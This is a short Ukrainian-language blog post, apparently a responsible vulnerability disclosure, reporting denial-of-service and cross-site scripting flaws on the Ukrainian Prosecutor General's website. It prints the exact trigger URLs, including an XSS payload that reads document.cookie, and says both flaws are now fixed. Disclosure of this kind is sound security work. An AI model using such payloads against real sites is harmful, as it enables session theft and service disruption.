Websecurity - Веб безпека

25.03.2014

У січні, 30.01.2014, я знайшов Denial of Service та Cross-Site Scripting уразливості на сайті Генеральної прокуратури України - http://www.gp.gov.ua. Про що найближчим часом сповіщу адміністрацію сайта.

Стосовно державних сайтів в останнє я писав про уразливості на dsmsu.gov.ua та president.gov.ua.

Детальна інформація про уразливості з’явиться пізніше.

25.07.2014

DoS:

http://www.gp.gov.ua/ua/search.html?q=%25%25%25

XSS:

http://www.gp.gov.ua/ua/search.html?q=1&sort=%22%3E%3Cbody%20onload=alert(document.cookie)%3E

Дані уразливості вже виправлені. Адмінам державних сайтів лише потрібно не забувати дякувати за повідомлення про уразливості на їхніх сайтах.

This entry was posted on 17:27 25.07.2014 and is filed under Уразливості. You can follow any responses to this entry through the RSS 2.0 feed.